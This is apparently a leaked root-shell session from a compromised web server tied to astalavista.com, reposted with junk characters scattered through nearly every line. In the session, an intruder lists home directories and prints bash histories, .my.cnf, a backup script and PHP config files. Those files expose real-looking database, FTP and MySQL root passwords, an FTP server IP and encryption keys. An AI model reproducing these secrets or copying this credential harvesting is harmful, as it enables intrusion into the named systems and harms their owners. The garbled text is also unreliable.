#####################################################1 E9 a/ F6 N8 f7 m: J/ i% t3 {$ ]& y
#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #
2 I+ [6 {4 ^1 v# |__| [__ | |__| | |__| | | | [__ | |__| #
5 j9 A8 r9 w4 L, h# | | ___] | | | |___ | | \/ | ___] | | | #
0 z* i/ \, o4 A# #. z7 ]) q/ r8 G
#####################################################
2 F* \- o) ^- ^$ k; L1 L# #0 Q" J8 }& ^" R4 }9 L. C8 I
# Admin Contact - 链接标记support@secureservertech.com #
1 v- h, e& f: Y! H# k6 @/ [3 B+ I# #
8 a( z. ~: ?$ s- ^( {1 O$ B# Available ShortCuts #
3 S$ c' j/ Z5 E9 \/ X# #
1 D9 V F; z6 u6 i9 x# nst - list active connections #" `2 Q, e3 p' q, e! j$ Q
# ddos - shows how many times each ip is connected #5 s/ W* I* P \& l) T& S. \
# ltr - restart the webserver #
2 m/ M- P8 j$ \; C/ j% S# phpc - edit the php config file #
' K3 T% `; D* B( z3 R4 b( e/ M# htc - edit the webserver configuration file #
, ?" W* {! r, l4 w% Z# up - uptime # l! O, g9 h8 _4 G# o5 W
# etd - edit the motd of the day file #; n0 k7 e# C3 a* `2 {
# htr - start and restart apache if needed #* E/ ?7 h) \8 q, o6 c
# syng - shows active SYN_RECV connections #
e+ c6 X6 B4 [% ?# synd - syn flood blocker - “synd -h” for usage #& U7 b# m# R1 j6 D m( P
#####################################################9 I6 {. A9 t- q/ J8 Z
# NOTES: #8 `& B# K; i! @# T0 Z: ]
# Last Upgrade - 12-08-2008 by JF #
, O# s6 ^- L- t5 M# My.cnf/Mysql Optimization - 1-28-09 #
5 k3 l" v% F X9 ~& z/ {# #7 P& W/ m* [( X8 P4 r
# #
! ~7 N1 n* D I: i3 b% F- y; O+ {# #
# a9 ~, h& k, `: x8 z#####################################################+ o; g8 @7 }. O( m
- X; U; ^. A( P5 e; S' T# M- Xsh-3.2# lastlog | grep -v Never
6 U2 x. E0 m8 Q5 g3 ~$ D3 iUsername Port From Latest7 I }' n" C, W1 `6 Z
root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009, a8 I9 V& a& c$ Y7 {
admin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
6 _2 q1 M! W2 jcom pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 2009' K& B* r( y1 `1 L
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009
( { Z/ h3 l( Q# l; h4 g: ~5 L! T0 u! f4 y2 {% w
sh-3.2# ls -la
0 i9 V0 v( G( F' {total 453376' n! P8 o' p: n
drwxr-x— 15 root root 4096 Jun 4 08:40 .
9 i. B- ?( j- [1 s# _( sdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
3 U+ T$ l7 ?" n-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip
k& N3 @) v) i3 s7 [/ y. F% l-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
7 A2 _; E1 X E-rw——- 1 root root 16836 Jun 4 07:21 .bash_history2 t5 r! ~! G. Q y1 O
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
; I, \9 B5 j4 M% T9 Z: [" q! J' |: \5 A-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
: M3 ~ F! Q. H. \' Y g% [-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
; l A# s) \8 A$ P9 Q-rwx—— 1 root root 1899 Oct 28 2007 bk.sh* l0 N/ `" m7 `4 u1 n1 {- L
-rw-r–r– 1 root root 1327 Nov 29 2007 cert
" v% t/ B5 T/ S% P6 K-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
3 H+ H. e6 G- Xdrwxr-xr-x 4 root root 4096 May 20 2008 .cpan* f! M6 N+ |, G6 ^3 a
-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc' F; d: w4 x7 v
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
3 y7 j& r4 j$ ?8 h, Ndrwx—— 2 root root 4096 Oct 28 2007 .elinks
4 t2 t1 I- N5 B% n7 R6 Udrwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1. h4 [2 c( S3 }8 R; U/ d
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
7 G1 g; j. V* D: c) i+ v& Z-rw——- 1 root root 0 Apr 16 13:19 .history
8 u9 X) I4 f2 p) i c: g-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
) ~5 N& p' ?! z q5 |) A-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog
: W6 O2 S' C2 d+ L% D5 j-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
6 Y8 N; q* _) W7 P-rw——- 1 root root 35 Jun 2 14:23 .lesshst _* s/ b$ @* q. o; B! ~8 l2 @
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
6 U! ]; o+ d! _" pdrwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec( [/ H. S8 G) x
-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
" n1 M# d5 _; C) i% E; b! B: n-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
* h& c% p- P I5 C/ h. G m-rwx—— 1 root root 760 Sep 18 2008 lp# H! \+ W q9 s% }8 J
drwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
4 ]- v& N6 Y$ P7 ]/ m7 M0 i8 D) r-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
8 P3 _6 ?7 a0 z T/ [-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.13 a( R$ k# A+ U2 }7 T# Q4 O
drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.93 `& x/ b1 M+ ?5 D) d0 k
-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
/ D# M8 N& v# t3 A$ s/ ]/ tdrwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
* ^/ P( {6 d4 e w) W" V5 `-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz9 G& Z( ~ T) B2 H5 i
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
6 T8 @8 C: _* l0 n$ l-rw——- 1 root root 41 Oct 19 2007 .my.cnf' z. j1 H3 |, @
-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history- b2 K" J# E- @: @& `; H3 h* w G
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport% g2 S) P1 {8 b. ~9 `$ C+ v
-rw——- 1 root root 41 May 20 2008 .mytop
( m0 P7 m9 T& k) x8 [4 Odrwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6# x+ c5 `6 h( U6 ?. x+ a
-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
+ i, h4 E8 Z" ?, Hdrwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
! k4 ]4 _. n1 \ L% g. V-rw——- 1 root root 1462 Sep 21 2007 opt.php: |/ f9 @& d3 `) S
-rw-r–r– 1 root root 3371 Sep 22 2007 p: N9 c( s9 ~- D# }0 i
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz26 l2 w+ G7 N' s+ \; m
-rw——- 1 root root 1024 Feb 3 21:32 .rnd
! y2 j. K* [$ `) H-rw-r–r– 1 root root 716 Nov 28 2007 server.csr- L+ V7 a/ n4 _$ K+ F
-rw-r–r– 1 root root 887 Nov 28 2007 server.key3 X3 h) |! o* g0 W2 D" P- V
drwx—— 2 root root 4096 Oct 10 2008 .ssh7 G" K$ ]! J1 v
-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
# j& O1 D' F; e5 ]/ o5 Y; h-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc
, b; _, Z! n. F! S8 r-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip
6 w) Q" P' e% Y-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
. E/ Y6 K' U: Qdrwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
1 p. P R6 S& H. V-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh& p- V1 p! G' k9 h) [: Z0 N+ h. t( c
drwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0 w1 _$ N: h+ n; r
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
9 S% {$ e3 N, h9 B* h7 h5 E5 M-rw——- 1 root root 12997 May 16 2008 .viminfo
; [# A$ n) D3 b; b' \4 _; E3 G5 c& z' ^* M. j6 t p$ `/ ~& s5 a+ V
sh-3.2# cat .bash_history; d% G+ {6 `% @+ t$ m4 X; E2 I
[snip]
% S" U3 ^+ M4 y( K: t' n4 G, zwget cp4sst.com/sstlinux.tar.gz
8 w0 s! U4 F8 p) |( Wtar zxvf sstlinux.tar.gz. `3 D3 v/ }2 z9 ~8 J" A# r4 L
cd linux-2.6.27.10
$ `! i u: K' O/ T3 w& ^/ Psh install.sh8 A7 h4 Z m* M! O& [% r7 F
make bzImage ; make modules ; make modules_install ; make install# t2 T) G8 X+ B, J' I- `& F" ^
make clean8 B. e; E+ Z6 l& e
service mysqld restart- w* U+ j5 i7 x3 Q5 Z5 ~# |, C7 a
[snip]
0 H% P. O% I/ H A$ B3 ^cd /usr/sbin/
4 i2 G1 X6 Y0 m7 x& q4 P5 wchmod 4777 traceroute
. t e* B0 B; k* r8 b/ Qchmod 4777 ping! c4 K3 a7 R( X6 I" |/ A
traceroute -I 链接标记[url]www.astalavista.ch[/url]7 a- H* h! n; F- |- k
[snip]
; c2 A% T }9 `vi /etc/csf/csf.conf
+ c- p O' w% Utraceroute google.ch
. R$ h, ]" r tservice csf restart4 t- Y1 Q. s6 P+ l v2 n. e, }
tracert google.ch' p) ~. ~8 u7 v; k3 @: A8 R
service csf restart% V1 _! Q- T4 U' l7 F
traceroute 链接标记[url]www.google.ch[/url]
; g# I0 b% Z- r, [( i2 [' ctracert 链接标记[url]www.google.ch[/url]
) U0 B1 c* ]' V9 ]7 t0 ?, Ytraceroute 链接标记[url]www.google.ch[/url]6 U5 O- W7 P' \2 V7 g; r& o
locate traceroute! Q% `9 g# q Z7 ~: Y) U
chown 4755 /bin/traceroute
: t3 |' ?0 U# b' @9 }7 Ichown 4777 /bin/traceroute
% U: R- w0 g1 F; q6 \' v, @2 alocate ping
6 E( { Y, N" E# `/ u; xchown 4755 /bin/ping
( S! g1 N- O8 m5 Jchown 4777 /bin/ping+ |9 u$ X2 e; o# D0 ~+ Y; i
cd /bin/3 n6 R7 o! c+ B) D4 C) U1 O/ t
ls -ali | grep ping- T' W4 M+ Q" W0 r
chown root ping& I7 y* [9 M0 r" |! H
chmod 4755 ping
) m. h; j0 n/ R: als -ali | grep traceroute) _- y+ {+ B, A" j, E' n, i. H
chown root traceroute
5 O, n8 V+ c( ~, }: o$ p! ^& |chmod 4755 traceroute
0 o; Y. u" e. W4 Ols -ali | grep traceroute: R+ \. U% \1 W1 M4 W
traceroute -I 链接标记[url]www.google.ch[/url]- n3 x; W3 B; v; Y* W* X
traceroute 链接标记[url]www.google.ch[/url]& U$ g+ W$ h, S* F0 Y
whois pmsantos.ch: q( k1 Q) Y4 P, m( A- t
[snip]& G8 p& `- u2 `* m
mysql -h com_contrexx2_live < /root/defaultp_ports.sql
7 ~9 L: _- `" Y9 W. V7 @( Y! Qmysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
& w: _. ^; o8 }5 q3 umysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
: u: F {* D: K/ D% y0 cmysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql) }- f9 c2 L" a0 e8 {7 H6 m
top9 d; H9 |& `8 }9 n3 [
ping ssth.ch+ h* F0 u8 S+ p
ping asdlkfaljgasd???ljg???lasj.ch
8 P- a, Z; M$ Y2 lping asdlkfaljgasdlasj.ch/ H) H1 ^6 [! `8 f! T5 F7 M2 W4 `5 m
ping 链接标记[url]www.ssth.ch[/url]
: _0 h2 f; z* x" i6 wping ssth.ch
: S& d+ a+ p+ Z% w; [) dnslookup 链接标记[url]www.google.ch[/url]
$ t3 W) m! N R0 X% ]: Z6 K3 Pnslookup 链接标记[url]www.ssth.ch[/url]) I& [9 u# {: x. U
man nslookup
+ Z; d2 k% U1 r$ L L, lping 链接标记[url]www.google.ch[/url]6 `8 W0 F2 c" g: ^( M9 k
nslookup 链接标记[url]www.google.ch[/url]: ^/ ]6 ?4 I; h( v, d. V
nslookup 链接标记[url]www.google.ch[/url]. E X+ ?- T3 Z4 N3 p: T
nslookup salfjasdlf.ch
& F8 W, n, o* S5 b! @; V' v; E[snip]& r. t6 k& a$ r" M$ R4 L5 b3 ]
openssl passwd -1 sadf7 r: T) ^+ Q' ?. W
openssl passwd -1 5cZNHstdTy
3 M; V* K7 L7 H1 emysql0 a: T% j7 F& j
mysql' `. X7 N# i c2 L6 P
locate proftp
0 @( F Y* S6 J2 c( Ovi /etc/proftpd.passwd- H1 R" D+ z4 o) j5 F
service proftpd restart
: T0 w6 J" l( V- Elocate proftpd.conf I2 r' |2 G' _: S% R! R( b6 P
vi /etc/proftpd.conf d2 K) _( ^9 Y' g5 K2 n
vi /etc/proftpd.passwd
4 Z! r q" y+ l* |& [0 yservice proftpd restart% f _; B( k/ {$ j0 X& G2 f
[snip]
! ^0 n6 }2 q9 O/bin/sh /home/com/backup_system/backup.sh
! I+ f' x3 h& z2 H: A: Atar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
6 Q1 R! G2 {2 i3 A% ^' U1 Pmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
9 w( O5 n% i, P+ T' b. R( o. Mmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
3 q5 Z( V6 h& Q/ D" }7 |ls -ali! _1 _; T5 S7 J7 I
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql3 w/ G' w( t4 u( g6 N# P
mysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql8 k5 {& b" M+ w5 U4 K2 B
crontab -l% W6 d! Z, d# |) X3 N. U
crontab -l
" g/ j" s5 {3 }; K% ^4 Lphp -q /home/com/public_html/modifications/cronjobs/securitynews.php2 S& V* c& X5 _- X. W% R7 D
/home/com/public_html/modifications/cronjobs/exploits.sh' l- _% m' U: t0 Z
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
$ |% h6 H8 S, s" A% Mtar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
0 E8 J8 L( z7 Q: e4 Mcd lsws-4.0.3
2 o) X E1 h7 s& psh install.sh
0 g2 U, \4 c+ Xuptime. Y! Y) o8 c- D U
hdparm -tt /dev/sda4 d& `: v$ l& H: o* s4 x" l6 W) X
iostat9 k7 ^& J7 b! L$ Q- o z' V) `! p
yum install iostat
4 |9 {, |$ t1 U* o tiostat
: ], x1 ]+ S. I% q8 p( ^whereis iostat
. F" `0 a' ?' n" Hyjm clean all
) F7 ~5 u# ^/ u# A; x! Y+ s j+ wyum clean all ; yum -y update
3 ~, d: t' M" F+ X; u/ y& ]0 Jiostat1 I" Y" d: }, E2 q% _/ R
yum install systat
8 c, `1 \9 ] `/ m* Orpm -qa | grep iostat
* ~6 f* D2 V& O% ^. l1 D* ~rpm -qa | grep sysstat5 o8 Y* B a1 e
rpm -qa | grep systat
$ M, ~5 I/ H/ W7 U& c7 H- ddmesg -c* d3 E0 K- ]; i8 Z
sysctl -p
\$ q4 r5 G1 w. S/ V% V: J% tuname -r
9 K. ~; F9 S4 }( ocd /usr/src
' ]% ~* U% P: ]wget nix101.com/kernels/sstlinux.tar.gz
: M M5 I$ q ?3 pshutdown -r now
9 k9 V$ O7 i% z% {nano -w /boot/grub/grub.conf
$ A: y% u: r- M. F& A* Y. N7 A
- k$ z) M, |0 M) Y1 h+ v+ rsh-3.2# cat .my.cnf
9 v7 V1 E" H2 ~! S! [[client]
/ v0 {1 y* ~" q: Z8 q, K" U$ kuser=da_admin, }; e$ Q2 L7 w8 s2 R
password=X9dctmRH- ^) z, C/ j# \, v+ [# [& _
0 e6 U% t/ e- }& u! e# K1 J, r
sh-3.2# cat /home/com/backup_system/backup.sh
) s2 \9 Q& y: \' N6 P- C9 z& r#!/bin/sh7 y& W) c5 U" f- G" B+ a
#####################################################################- e" }, k% i, }! ~0 B9 V
# #* Z! F8 V3 l3 `$ }
# incremental backup for astalavista.com #
1 \: S0 U7 ]4 O0 b" C# #& B; F. M/ v$ g4 V! W
# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #$ N8 m! ~' H- V8 X$ a: u' d2 x
# #
$ H9 `/ \3 u' }' Q3 R#####################################################################* M' V# W0 _" [ w5 f' N k
[snip]) G# I8 T9 L& H* ^1 }
PROG_DIR=”/home/com/backup_system”;) S0 y. a+ k7 _
BACKUP_DIR=”/home/com/backups”;
- T" ? p( @" T NDOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;: u$ x" Z: _" Z$ W0 e) N
# ftp for synology backup server
* b% z# R6 L! `3 U) TFTP_HOST=”212.254.194.163″;6 ]+ p6 F/ c E4 C& S* }( a
FTP_PORT=”21″;% b" y* k$ [& V+ d5 g, `# }3 K3 F
FTP_USER=”astalavista.com”;% D9 j- l3 Z* w1 \, L; e& W
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
$ @% J. N4 R. ^; e% LFTP_DIR=”/astalavista.com”;
9 ^0 c! w! ^+ h0 j1 F1 y# database
* ^) m$ [/ W' c5 H/ B3 _+ fDB_HOST=”localhost”;8 [7 M: s* X7 J! f9 X+ W! b' x
DB_USER=”contrexxuser2″; l' [4 O2 K' `& T: r0 Y7 L' V
DB_PASS=”0fEYNZgXz1pKe”;
8 X$ t0 P1 Y2 ~$ D7 [DB_DATABASE1=”com_contrexx2_live”;
! J: e6 E# u" IDB_DATABASE2=”com_contrexx2″;
0 ^+ d' ]/ k8 _/ E' S[snip]" d% \$ {' w* v5 d/ T" [! @
ftp -in $FTP_HOST $FTP_PORT <<EOF. k1 \7 d" y& `1 B
quote USER $FTP_USER2 I* k: K' E, ^. Q& ]0 t
quote PASS $FTP_PASS
^8 r! \# x; f. N+ ~ S" }cd $FTP_DIR
9 g6 p; r# a3 k4 k% J7 e. @. @. Qput $DB_FULLNAME-SQL_Dump.tar
( y9 f3 f; p) i, s& q! s, a6 Tput $BACKUP_FULLNAME-Public_HTML.tar
* H% ~ Q% V" x9 \7 lclose
6 b& }; I ^6 Q* O2 C! fbye: T1 T- B7 I2 O/ D9 ?; F# R9 M
EOF
6 o9 _8 O2 c2 }* S0 L8 y; W6 L( s0 K$ u* @, b
sh-3.2# cd /home
& A; O* V4 D+ ] z# hsh-3.2# ls -la( F! V4 t& o p& Y/ p/ ^
total 1208 C; D) E( D. E4 X D! W! Q
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .4 d$ j% e: S$ x" \% L2 n
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .. b) u, l* ?+ ~8 t8 z6 A: U4 i
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin6 h" D2 A' p. m" g4 Z7 ^5 L( n5 l
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
k, u, J- N# Q3 X, I" l-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
) J9 ^4 K% F$ y) Hdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
4 ]- f$ q( t1 l) G# M$ \drwxr-xr-x 2 root root 4096 Jul 29 2008 backup# z9 N& ]5 @) T' o
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.141612 ^# M3 Y% @; a& \! m. c
drwx–x–x 10 com com 4096 Apr 28 12:40 com
1 }; K! D1 o4 rdrwxr-xr-x 2 root root 4096 May 17 2007 ftp
7 q/ m0 M9 Q. H0 |1 z- `( [drwx—— 3 jon jon 4096 Sep 21 2007 jon
& A! f k2 u& R [. y7 E Qdrwx—— 2 root root 16384 Sep 11 2007 lost+found$ }2 A- x% _7 D; p1 e9 {- V
drwxr-xr-x 2 root root 4096 Sep 14 2007 my% ?& \4 p& v9 D9 F3 a
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
; T, v" T+ U* G5 q) @9 b+ J% }) X% Qdrwx—— 2 jon jon 4096 Sep 15 2007 test o z, W# I. C
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp
i m6 y/ ]! w3 \6 O$ i+ G+ b: h9 j; s
sh-3.2# cd admin
" `* A8 h6 C7 z! U" K- g3 Nsh-3.2# ls -la
: \. J% T4 c3 Ktotal 1735896: M% z! t: W6 ]: ?4 Q
drwx–x–x 9 admin admin 4096 Nov 28 2007 .& a+ s+ w7 t9 N/ e+ O7 V$ e8 R7 K
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
- T) { V7 Z6 adrwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
3 a7 v* J# h0 H6 z" V" b; v/ \drwx—— 2 admin admin 4096 Sep 28 2007 backups; ^9 V! F/ e) H# o) o$ N( t/ B
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history, U# F: V- B5 a. b6 |/ [* s4 O+ }
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout% }# J7 O/ k$ Q% G
-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile4 G2 b0 |; B" c( S
-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc
7 c: r8 s6 C5 g% k9 u h6 udrwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
: F! k1 t* K1 w# A, Udrwx–x–x 6 admin admin 4096 Sep 21 2007 domains: M; c/ M7 [0 u2 |5 M2 b
drwxrwx— 3 admin mail 4096 Sep 21 2007 imap
! u+ b7 @/ J! [0 h& F5 ?-rw-r–r– 1 root root 24 Sep 21 2007 info.php
' F$ R9 Q5 E! v1 J/ Ndrwx—— 2 admin admin 4096 Sep 21 2007 mail& z0 v' s7 \* _* [; {. p
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr: h3 g& i+ \# E9 l: h5 x# m
-rw-r–r– 1 root root 887 Nov 28 2007 server.key
) y5 h: ~* j7 d; d( k-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow
! k0 A( k! {5 }; E-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
$ d( u% I& G4 [& N, Y& {drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups
/ f7 j2 R1 }: P# q R6 K+ X# w" n; F$ |
sh-3.2# ..* ^% j, D3 R2 D+ @
sh-3.2# cd jon: H6 T* u( |/ a/ o4 I, h. I
sh-3.2# ls -la; e( p" i- K Z2 ^6 E. ~: a' ?
total 369 s; ]0 H H/ |8 A9 [4 \. y* f
drwx—— 3 jon jon 4096 Sep 21 2007 .
9 Q# q# A. `) w! idrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
: f+ R0 o1 G. h4 {, Y& N) b-rw——- 1 jon jon 53 Sep 21 2007 .bash_history$ ?8 r: d- J7 O/ ]9 d T D2 z
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
0 |1 L( H% E. J9 T3 [; l% I. r-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile* L& d! C9 @* S# c, r
-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc9 ?7 M k' \9 l- H9 ?5 ^# P) s
-rw-r–r– 1 root root 24 Sep 21 2007 info.php
9 z8 {# ?) s, |9 |! |drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
; X8 K7 H* g6 \8 r8 w
& H- i- i* A6 k' h$ wsh-3.2# cd ..8 c% G1 P. j( ~1 q5 h) H( _, A
sh-3.2# cd test3 h$ k V( h% c @! q+ {+ A/ j! @
sh-3.2# ls -la
' H% F" A/ d5 B# O" t, m# Ttotal 48% i( S0 J+ S; r. C( k& J
drwx—— 2 jon jon 4096 Sep 15 2007 .6 i4 }& R4 y3 y5 G" c t
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..* K( Y+ }" S# F9 a: }
-rw——- 1 jon jon 79 Sep 21 2007 .bash_history
* ?2 E- d: P4 R' U, u0 i-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
7 x9 A4 z6 S; G# a* w-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile1 A; M% A1 @) {9 \
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc6 s1 u6 \8 g2 Y2 q0 Y/ D/ m1 v! D7 g
sh-3.2# cat .bash_history
. D9 Z% _% J0 T7 {6 _8 ?! c! b/usr/bin/mysqladmin -u root password PoliuJhytg67$ R! o5 ~# H. O( A/ r H5 V- S: x
, q! i& V" x4 x! Csh-3.2# cd ..* s$ Q3 R, c( {1 b) G
sh-3.2# cd astanet
4 e1 @# B4 ]( ]' |; A9 T, o8 Wsh-3.2# ls -la; V) S* C! i- p [
total 52- e( P$ p8 x! t; X+ {
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .5 r2 @ \8 g8 G4 S; m. O3 V
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..0 [1 y) X, o9 _3 G0 ~ d2 }- L
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth2 I( A6 ?3 d2 ~3 y
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history# z x0 W8 A' j2 O% }% ]
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout3 g+ {( H( z2 Z) P! X% ?2 i% F
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile( l& l# J4 l/ l7 D) E" j
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc( w1 W6 o6 u( b% a' N5 y4 @
drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains
" f( d! ~8 H7 t, [4 G, \, Cdrwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap; X5 r: d# Q% ?% A ^9 D/ D
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
' [. U, G: f9 W3 A-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history( Y( ^3 D$ S0 m
lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
$ A, y9 a$ T9 K! Y. w' o-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow$ H9 u+ F4 ? w$ k6 C5 }( I
( H( p( w2 _/ k( A% u' Psh-3.2# cd auth/( ?6 _/ S, O+ x( p/ O3 t
sh-3.2# ls -la
M- H5 V5 N ^" Y Stotal 28
6 u5 h% K1 Q3 o' O/ B8 u* e' Jdrwxr-xr-x 2 root root 4096 Dec 23 16:00 .. ^* x+ @' {& c
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
5 y9 h( t2 R! a8 s0 W5 G+ l- g% c8 n-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php$ O& r% `( c( {1 B% Z: N2 H
-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php" x/ M7 M5 M. W7 e7 r0 {2 b& e9 T
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd
6 w9 Q+ }; n. {8 c/ g/ r. K; I-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting7 Q' t% s' d- n
-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd; O4 J2 D5 Q! W5 ~# f
6 S# O) P! f, N1 a; \( qsh-3.2# cat hackercontest.config.inc.php
1 s3 U/ c/ j, F; I<?PHP
7 S6 P) l' f3 J) a- B) R8 ^7 G: H// Variabeln f?r Verbindung zur Datenbank //7 t% v; R7 }& g4 U* D
$conxHost = ‘localhost’; // MySQL hostname, _8 E+ f$ E' n4 _
$conxUser = ‘hackercontest’; // MySQL user: i# j0 O1 c' c: }: g' z4 D- k. W
$conxPassword = ‘K6m@7dUc’; // MySQL password8 H( F5 V2 f M
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish( n2 l" \& C1 @ A$ ?5 @! d J
?>
1 w# w7 b4 _0 X0 D+ vsh-3.2# cat hosting.config.inc.php
" ^ Y! e9 d% `7 \1 F0 u<?PHP
$ e5 o& ]& K5 P// Variabeln f?r Verbindung zur Datenbank //
2 A* l6 L4 D+ C o: M9 h3 ^; K$conxHost = ‘localhost’; // MySQL hostname9 F5 ?% R2 f$ i
$conxUser = ‘hostinguser’; // MySQL user
, C4 k* o! V% L' [2 J. Y$conxPassword = ‘cXvB3981′; // MySQL password- R8 g: U- g! n" B
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
9 D0 D& o, J$ |7 H4 a! u2 x) Y?>" r& C6 H8 f5 b3 J3 q
, Y' ~: g3 Y: J- u+ N; ~2 v, z- |sh-3.2# cd ..
! V/ c$ I. O+ D2 h# k- e! W. i; |# ash-3.2# cd com) U# C5 T( x% ~. t# M5 `, G
sh-3.2# ls -la. B+ r9 l @3 _& Y) R/ ?
total 141208
